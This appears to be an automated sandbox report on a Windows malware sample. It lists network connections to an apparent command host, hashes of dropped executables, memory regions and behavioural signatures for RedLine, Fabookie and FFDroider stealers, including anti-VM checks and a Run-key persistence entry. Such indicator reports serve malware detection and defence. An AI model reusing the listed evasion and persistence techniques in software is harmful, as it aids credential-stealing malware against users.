US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp

Files

\Users\Admin\AppData\Local\Temp\file_clu.exe

MD5 ec8866c33b44b2e1e84248220ab66d0a
SHA1 07025a834eff898dc14555ec821dcc543d9ee654
SHA256 50e87075abe81f2accb11006aacff87513b8998a8be78721257767cb3c04930c
SHA512 323279e425059c43433d29de60c07d71cc4469164e41bf5211e4787a0949955469270a1a998f60156538b943204af3fe4b5eeeadea38d2c5d655c65a52774ede

\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

MD5 bbe815cb088b8f5a20c6b29313b87ca3
SHA1 92cffb9ab221fd3eea757a90593d3d035de9c152
SHA256 919c8403de9b81f4ca2cd3b6aa96bc7f778d7f1472b547fcc6c6e12ff373ce69
SHA512 5849e5900f32178e55b9c234bba30d7f9c6619c80ad37b07310796807f3e7322ec10db62afebe610fc1092867921a0788d403bf4c31a15e8c650bd4cb108654f

memory/2092-45-0x0000000003760000-0x00000000038E0000-memory.dmp

memory/2092-46-0x0000000003760000-0x00000000038E0000-memory.dmp

memory/2672-51-0x0000000000400000-0x0000000000580000-memory.dmp

\Users\Admin\AppData\Local\Temp\asj.exe

MD5 4ab590bec37edc62624775803da478c4
SHA1 b8388887db2d3a1ac846107e209bfd81007c5633
SHA256 a72c59af764b96223658f375a7622a78a422af6381a5fb746e870043b0d20dda
SHA512 b686081b73c053843febdceca215ea0a11f55090af7240454919168f564a38785b5d94c8d40598e7d629b7e03e13089e24a7beb0a6748cd02ee6192b8a28f0e4

memory/3024-63-0x0000000001290000-0x000000000131A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

MD5 a4e461c7f3a7c8ed80168346e5f7b41c
SHA1 d618ef96903475a1c293546072fb1f80c7d5d334
SHA256 530af4a5976975c677d10507bcbe82d9a9a0b79a6576a4cfed87f08b828d756c
SHA512 82649dbbd2f003904d1b6b4f0363f3ea29113a0f95705b1346d1086ce35370976abf154043674686c90828a25e107ffd3a9c8219a643992b1337aa1282993494

C:\Users\Admin\AppData\Local\Temp\cld.exe

MD5 749227d9d9f16b8129f3449540dda022
SHA1 9a3bb6c18ce59134671c1871172d78d7ee1947bf
SHA256 9b853f186383e7e201c978a76857d60180b279b308d633b4b078669473b7de51
SHA512 45b7f36f4e01263ba0681cae614e3ab32b12d19a816e6003a37ff6905af34e221bb42edf95cdef00357c3d83248a3cef976e22a21b01638cdd1e161ef18db3d0

\Users\Admin\AppData\Local\Temp\ubisoftant.exe

MD5 fa8aff97902b0cfd09cee92a6646c442
SHA1 3d224398f7e101b578949a8cee39142e19586a2a
SHA256 b2c316e8fbbd4061a11f02ee491188eb0e7a2cf86377ae5dd629d4e49c372dcc
SHA512 a4ed99ee8b65133f95dc59fd800dca65266a5fbafe9e37024a4576382aa261f749e7f57354981c3738c3a1a0338b09188c0c031adf2c375b218942b0b02d2d76

memory/2452-142-0x0000000000400000-0x00000000006BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\piz.exe

MD5 310e87af0b8f40379bed1095dd7372b9
SHA1 1ec32c123ddd840afe605dd737e014bd88c81729
SHA256 a030bb0e1fbe87049fc34c6ae53be0b6e3fb0176c560abddce3cfe95ac14671e
SHA512 a050d7333bca926fd2651374e81dc6dd031a88a0b60375324d5298f6e876aa8d73593089729e015ba10f14eac8375fbbac713aaf1029438240943f8b1980bc96

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

MD5 62b0362a4fc3a80879781d59186c0d98
SHA1 a121775fa01f85b84f8c2cddc8002272fb4dedb9
SHA256 77f7155b68c505ffc34d80a20bc5e68292017f1a04e39eec1ca75931d32ae02a
SHA512 5cdff373b7d03dd0774c739f692f211595b950a2f3345acea5575345331f01221e42265451b5d642f74d384b66cb55d15643e390928fce6b3cfd189b42320393

memory/2672-167-0x0000000000400000-0x0000000000580000-memory.dmp

memory/468-197-0x0000000000D10000-0x0000000000DBA000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 9a33e86a442033fb91f30257650fa530
SHA1 fb435f8a0fa371f8cf21b856fda02783dab16ed9
SHA256 87b42afa55daa0eb8d43daa9f39fa08711aca0fddf1a1c522750611c1fa19852
SHA512 0301d143bd3584fc9dca958fa62f018438f59e0158b55e47e69f709bfdf6e4f066b2e42b8ad4c0cdc2698366a066edd0f75c78fcd68d806a88cca36885bf7176

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

MD5 051e0cb61c4ef9db71b28dceefca1898
SHA1 bc1e5e91ea898e304c9e6d64d1d92bb56e0c2d8d
SHA256 1913bf1290328462ddca77ae02828a130f810e3ae32f3c2051fe916c22d686a8
SHA512 7575cdc0a78fe9d59032c4e2b70c4f275e0aebaa0e864cbdc6be057dc44256ff3c5f0031be1b164631850b68043ad6ef220d0865be59398acd080aa58ad43858

C:\Users\Admin\AppData\Local\Temp\RarSFX3\3O0QMRE.5k

MD5 a320eea9b374af8f33c7259bff834f36
SHA1 847232ba91a0edbf2ec601b32a14b7acca207188
SHA256 2630401d8832e0c7becfe172eec94f682fe9538bda72959dc0a34a89b062d32a
SHA512 1143ed8801ca2bdce3fd9fbaf9cfb9b62d358a70eda0bb8e60c46020acd85c05818f21eb927707220cdaae8bcac09af68d7c48e3de530e6ecc95bc193d5f0afc

C:\Users\Admin\AppData\Local\Temp\RarSFX3\s77950_.98

MD5 eca5b98011451a8e5610fc3582f1cec7
SHA1 c8d4aa87d8d46840797053cf3df70e7c113cd367
SHA256 02da3610db6f9897ecdab67889e04783689cd068c9be03bf16e02b47677541a7
SHA512 ba9888e695ee2b21fd843f82232d705c883e4152b90d46532b9053619ef2d10c95187a085292940a8b580fd3bc54610bcc0258be537ce0cfdcdd3a45d450d2d3

C:\Users\Admin\AppData\Local\Temp\RarSFX3\C1SM1U.Qa0

MD5 672b1ee78c936158ba4efffb83282ebf
SHA1 61d2965dc650bf886ec87406392b227c97325b74
SHA256 fc65dbb28a0612c2fe1308d9ee4bed10ce7ba5feffc735389b30a883b4941e50
SHA512 eb4156e00f4bfe33668f7e13dec400d8bc70c21fed3719a600f64e19b5bf232f54df05aadd5df215a0bfd247b77c9122c484850d3c81002995fd46ea8322c505

C:\Users\Admin\AppData\Local\Temp\RarSFX3\h7__2bUr.8I

MD5 680507e4bdb04f52bac3bbfdb730515b
SHA1 6737a09197fe16f7de7e249c7a3a84b0f06ad9f0
SHA256 50bdfa225eda4001957ddc29ed093bdd20bc170a0ead6f619d2a47d9f701d90b
SHA512 b496d5566ad68021d8418d31de06b012e5ce1f346f118506a95348966e6ed25d98f79fb76dac91e9d361c3cfee66d974154119a4da5a6f583265fcb2db2f7a3e

C:\Users\Admin\AppData\Local\Temp\RarSFX3\G62c.4

MD5 0f2c1adba7cd67cd15dc63dc0eda814b
SHA1 de7ac87e1b684c80a5c1ef3a6b91b19c6ad27d84
SHA256 89a89138143c1ff9f168d3c2cf7a6ca8573dea820b97b3700746a0f47ec11a38
SHA512 b5fe77451429eaa7a1cb99cf71508128ab3a132576251978e82ebea037e819527400ad78ee3b8567cc305171268b0de9e055e146b60b3afcff00cda28c4527bd

C:\Users\Admin\AppData\Local\Temp\RarSFX3\~Ted1E2.CfH

MD5 6d3dff024cd32c6b6f127467ed5b3a87
SHA1 2d699353e56846b0e93e15a326a66ed69c0c2c5c
SHA256 fbbe6f094cc075ca2a972e300a492bcf501a371e966f5573d7c33e3c2098b9f8
SHA512 4199499f6acf1d13e03011f5899542383a42193501823c94349eca8a31efb0714fed1b37b31032ff5054723a3b4b44f1697c64a01b66d25674e1642681a0a0d0

C:\Users\Admin\AppData\Local\Temp\RarSFX3\wUAR.VX

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/2932-150-0x0000000003BD0000-0x0000000004362000-memory.dmp

memory/2092-126-0x0000000003760000-0x0000000003A1F000-memory.dmp

memory/2092-125-0x0000000003760000-0x0000000003A1F000-memory.dmp

memory/2092-122-0x0000000003760000-0x0000000003A1F000-memory.dmp

memory/2036-219-0x0000000010000000-0x00000000130E5000-memory.dmp

memory/2092-107-0x0000000003760000-0x0000000003A1F000-memory.dmp

memory/1872-221-0x0000000000400000-0x0000000002F94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\secd.exe

MD5 89c7d9d506e2d2ad1e86df5dfe5d318f
SHA1 c6b59a79d5926fd3b5d7f292a134290f9d4984a9
SHA256 ba79703eaeddefc846a71a9f3fd9a65c036725f2bc8959dec4f564ed68373aca
SHA512 82220ce0d0e7df3078f299ce56afc7d8e4b24804e9bc03e4bc753619d9f2e92c34f2a3d492f9fd22428ecac3358be2853c92f1ba38f57dfc5c063ac2e38f151b

memory/2092-54-0x0000000003350000-0x00000000033DA000-memory.dmp

memory/2092-222-0x00000000033D0000-0x00000000033D2000-memory.dmp

memory/468-238-0x0000000000480000-0x000000000048A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD8D4.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2092-248-0x0000000003760000-0x0000000003A1F000-memory.dmp

memory/2452-247-0x0000000000400000-0x00000000006BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarD9C1.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/400-300-0x0000000000270000-0x00000000002CB000-memory.dmp

memory/2152-299-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

memory/2036-316-0x00000000006E0000-0x000000000076C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\Local\Temp\Shakmp.url

MD5 3e02b06ed8f0cc9b6ac6a40aa3ebc728
SHA1 fb038ee5203be9736cbf55c78e4c0888185012ad
SHA256 c0cbd06f9659d71c08912f27e0499f32ed929785d5c5dc1fc46d07199f5a24ea
SHA512 44cbbaee576f978deaa5d8bd9e54560e4aa972dfdd6b68389e783e838e36f0903565b0e978cf8f4f20c8b231d3879d3552ebb7a8c4e89e36692291c7c3ffcf00

memory/1696-340-0x0000000140000000-0x0000000140792000-memory.dmp

memory/2036-341-0x0000000000820000-0x000000000089B000-memory.dmp

memory/2036-344-0x0000000000820000-0x000000000089B000-memory.dmp

memory/3024-345-0x0000000001290000-0x000000000131A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

memory/400-351-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2036-352-0x0000000010000000-0x00000000130E5000-memory.dmp

memory/1868-354-0x0000000000400000-0x0000000000422000-memory.dmp

memory/400-353-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2672-355-0x0000000000400000-0x0000000000580000-memory.dmp

memory/1696-358-0x0000000140000000-0x0000000140792000-memory.dmp

memory/1868-366-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2932-367-0x00000000036D0000-0x00000000036D2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 37d5ff4964fdc0aeceb6febaa0b0a676
SHA1 85230eec2546b788d1d9d457ecee2a60e275f84d
SHA256 4168b3170ba5f623f1acc4179d95e9e2de4cc45eacb6a44854b248f02be56db6
SHA512 ae3e1622e5ac17a58bd5be7215508b137480c365a490690f09574afd2452b77ee9d3889b3e222526e8b82703ed5966319dbdd4b9190729cc2d17f5e724a4808a

memory/400-417-0x0000000000400000-0x0000000000422000-memory.dmp

memory/400-416-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 497ff7e7096901403b6dbd27fb87c289
SHA1 95c7128bba261a859aa2b1a6b2892c6adbdb98e0
SHA256 f451cd75f5cd2fb2c6f83b46f1c2fa8ac6aca02b1b231e895465f53e6e4dc715
SHA512 f6de574ef1900947352b67c6edb3b6ff41493747fbf1e4bc9a2a8edefa8db407572a2e672507e5f97b7863afd42ff45e0e0bde4157489c9b3d0406b7546ea2c6

memory/2036-475-0x0000000000820000-0x000000000089B000-memory.dmp

memory/2036-476-0x0000000005920000-0x0000000006264000-memory.dmp

memory/2036-477-0x0000000000AC0000-0x0000000000B34000-memory.dmp

memory/2036-478-0x0000000000C40000-0x0000000000CB0000-memory.dmp

memory/2036-481-0x0000000000C40000-0x0000000000CB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX2\ins.url

MD5 eb257f27de7df09999ce97322e76aed0
SHA1 a9d1b7c50ef40c2fdb0a1e3204247817ae859c08
SHA256 375a74de5452d2a16e17d1161eb77e0a54f1eaa80034e6e22f1084fcb9c5ba35
SHA512 257d16f8d1153febaa500e4ee925544120101e5d3195aa77637448471e0a55560b145e8130ab420ddd289f5999a1663eec306da82b50b136a20f29906dd009dd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ff25e6448c06c9ab47652ae598b9ef9
SHA1 d4e02815f6c59d773ea73e8aea772d25bfbc0809
SHA256 7985f6b5c8b8b8374397b5a6dd6ed46139ffea33c48f57b8fd88142c5a89c877
SHA512 d0e5b5150a988bb2a9b80aea3b6687216ed6f89561dd7c8e7386546eadc817502e79538c73fad4cf198e589ccda4a0a16915318a7264e8b2888884623f2e425d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7fdb48136d975325019bb7fe35161b22
SHA1 0bfe67af5d929e0164a08a6281aa89d57cc311f4
SHA256 fd9fc898378ae351cd1b27c249266c5468581177eb968c988af245c9cb90a325
SHA512 739140bcba8750f89805cf69fe7abb3154243599ebc6858cd11a1a750a5de812c168f1b26ab79685c951841b59daaadebfa607e08dc3d1bd9203f28f8c65271b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0333b47282e6641dd3f3c322441bdbd9
SHA1 01134d3aa471c6d0ed7abb786eb0395679ec0ef0
SHA256 53a269a50f1dbc874930e5d9aa9feac6aee71ba8a246369a5bd55dbf6033bf76
SHA512 9511db51b4afb0eb69514bf81d267f775faf257b7e45b1f9dcc3f03470ab34288270e45c1157f1684799a47dbe6feae19d74609be8fc0cd6da256644f6b83d9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3343eeea374a1f6c4c23be821cc01d61
SHA1 ce329c13bf7a2663fbcd572403364d5950e7c20d
SHA256 e87fc29a93677a0041e7854f052a4ce0b762dfed56edcb96ec1de41156b65db8
SHA512 8ecc788dea82ce64fc7237d2c798de5150550b840195624ab6eca9c0bd95a2d13451257a6ae17041420c8377b75f340644dbda037c5a2d098d9514d5c9e3acdb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 83d8ed3fdfb62d2f57b24ecb45c9c3e3
SHA1 efabfe5be241a61918a9f46277d6abc1d8307db4
SHA256 5c24409f659fa8c4e3f18474ad29fe41c04a7160fcb6c10c14264b44d10188fe
SHA512 2bc1bf0e343a5f4758de66c350daa381b589013b89e25e7ab90548938044269e2484090c8b93c8f13c3b77a4201e600d799253538fa0f402f1d8695e11a71faa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c0d621336e73855b0c7014fd375761ca
SHA1 8c2857694e4c655c4681b67524046b0d346f442b
SHA256 37ba4288f76b7baad1499c08130116ba939c58ad46da028581b5c7522b9908f2
SHA512 be09c030d048dedd3da4cbde6066ca00c56d4ca5db758ea03066c3c9ace59117cfadb49f10bc3cd03b6799550fa8ae90612ac57330bfebea7477439efe48e268

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3148f59a8b9926b6dec95844b3dd5402
SHA1 ed6fc9cf35046e76b8dedb797874b92d5e29ae5a
SHA256 92afd202d1f99094d68526f9abc50edf41b629e39bad288c612ab5bafb781a31
SHA512 bc2e363c0a8320e78e681200d66ed5bba10ff3e21c70b52b25c21be0b2b0ce80ec48168f56ad687e317d7868d31d602b277012e1c9237e085b6069e2979ef0fa

C:\Users\Admin\AppData\Local\Temp\~DF28A0F8F5BF2EF861.TMP

MD5 bdd9803d5ed64de9f02e2072a95e5026
SHA1 ec74b54457e12bfd849283f6d692e9fe8a537334
SHA256 6785a86738850e47a302aec0059542216c7d30920ecee2d90b8cc10effade603
SHA512 a3c03f096ad84854a98291445a6d84319149d25572471be2ac49703158712a7ec0f5c7b6124e0610ec76af4b5dd684fabb7e9c1066190f15bb98a7b49d11f08a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\1rxTe7[1].png

MD5 ec6aae2bb7d8781226ea61adca8f0586
SHA1 d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3
SHA256 b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599
SHA512 aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

memory/2672-842-0x0000000000400000-0x0000000000580000-memory.dmp

memory/2036-843-0x00000000000B0000-0x00000000000B1000-memory.dmp

memory/2036-844-0x0000000000C40000-0x0000000000CB0000-memory.dmp

memory/2036-846-0x0000000000C40000-0x0000000000CB0000-memory.dmp

memory/468-904-0x0000000004F70000-0x0000000004FDA000-memory.dmp

memory/2892-917-0x0000000000400000-0x000000000042A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\jul.url

MD5 86c2d12cf59713392ee1f00f4ae7d400
SHA1 3ce715154197578c0be76a25566d5d03423f5d3a
SHA256 411c1d3a748c98a45613bd73ac9a04d6069f6db64bf34b0c4e99dc4852159abe
SHA512 f7daa632eb6d5e11a4571af36fa3bf370781d58b1141fab5df6de8a07bfcb16b481d295ca8fe1fc43101c87cf65fa1beadc1c9478071d030172c41ed6a569ddf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 54e8063424365579057d20e372272447
SHA1 8a987853ebffdf45316eb0f3ecf6445e169cab14
SHA256 be95cf48e593ef35e5f3777f5b7c11de129f8a8f8be9eda18bf88ba1fb464440
SHA512 ff1600b33e5bd9d81f6d0fd7568dba9f828490d45e39b75165a6ecac5cbc064fb2d2d36f74ed49a942e6d05ba30ddc3f10a28007f70a9995f9b379283220fced

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ee4c40d5f7c738ea4557aec6064b7018
SHA1 0900eff559ee237c907019bf13559ea23261d12e
SHA256 a0e2c09e18c558cd249f5c9aacecd2824de68bf05ead4fc1207cfe69acbd030e
SHA512 a3e13465cab2d9cb0ce415baf0802b44f437058dfd96b47d39bf12caec162900fb6973f9f9e9a113b00f920b45cc27d44b1cf3c3afb550e2ab42886a8f638fd4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 608c4166c98416463c8292ed5b4279d9
SHA1 fc2a343ce7a38e63857c7f8f1176f7a79b70ee88
SHA256 73ec26e9a4369f5958249d760172f57a7ab0fc268deffc43fdb65a3f80d79889
SHA512 86ac044bfb45b31c515983652a087c39789f71ef3b62d628f427e15db74a09da614f92445b985a7084a6868f75f6adfb5203cc47e929fcb8105ec8d2842c9df0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 69a9cf8103c918e3c4315911d382be3e
SHA1 878bde2a4a0aea5e408120ad412fb66c203ad3aa
SHA256 319146aabe0532ac6f4bfbb703ed349901dcdc0676b4c9afbdf74f6d8754e537
SHA512 3b14e6a896837185b392346c9151c312055724a70c121999791e46576c15ef6109531daa5113d973556a3a3eec4aea6d42663ac22f68bb20b47a7382d480a919

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a014754f6306c09bbc34f67d286ea22c
SHA1 7cf31d404f33b6b1fb002bfd5da654af89f5c3b1
SHA256 c27cb3a937a60056b5995badda4917dc9104f5ec06f85a6ade7cd780e460b0be
SHA512 27b090f2baf3870644214e83577129ccaaa3e04142cfbc250c6026ebb4850e3be004b8a6f0a9702111223a6c97d9d1634e0c92e6f298ea67e40477acc1f25361

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 0322d6f8fda94a9ea502d17ad1b94e22
SHA1 32e7211a9d0fbacc20f9accbdb35569ae6e0c801
SHA256 f49de1a0bc6eb09ce41aeb689379ba8401da8c3b656546a59ccbfb3bb77b725f
SHA512 471d4a12fe7967fa8582aa0e22ed338aa046db980db20f583d35ebbd95b45871b1538e270e35be5c0348242a3947f1e46d7a0141b4432449ce324af016071a4d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4d7ece5ccccbc4034ad5ef14bb404c89
SHA1 3c0b5647b4441395165185dfa0f1614570e42187
SHA256 a86520586c4dc8141585aee07585aa2ecbb50690420cc4a97971f6331129dca7
SHA512 5d4f7598d13cc6df22575004d930fbb2f9a98480e40bcee38d5d6915449cde35704a6b0b61d24ea4dc6b1fd576de675d74f5ed8c6d9c742fb820a2c46a1f09bd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c98ed569ae2445d3c6331ce80e821dd5
SHA1 3efd0079d58d99343c1046951784fa935ab30b63
SHA256 b27b6118826fe610c29899c4f398fb04a421a776254c45042663e479690a730f
SHA512 e4480e2b067a3045745f92dbb3d8f64d790d14cfb718b4b08a41a1e7e6eb3a94881521e8f2c18ec2708eb8c977675bcbbf797c2efb78be59e52569136abb1c85

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23da953f78d6f973a17af1220ed04520
SHA1 251d08cde3b33bdea61f6edda660e4913a58d8e3
SHA256 d391ed5216e84056fe271a426a58afc2ef6318e155dac472dc04a84c4a921a68
SHA512 6a4b98ab90bc35affbcf044e2c7fc9c79d901dd5a6d46f4de803e08f50bec22f245a74b7f95a2cf0cb991765ff97238196be65c7692d0ba33dc4e0edd069d81a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ba1b799e2d2064ed0979446af16ee808
SHA1 8a01758ee89c2a205265f338d30b018496dd73d8
SHA256 5c17a70a0d529e7533d6f47af8a632771977d800b7889e13a6dc3a1c647862ea
SHA512 bc895e204e9778d5f5e6413cf40fee4dd481b6744aae3673ee40d08f441dfcf66b1fc881d529a69e2c032de75c69d901074bff39335c2e24ba823c3336c7d235

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 20:25

Reported

2024-11-09 20:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cld.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng." C:\Users\Admin\AppData\Local\Temp\piz.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A

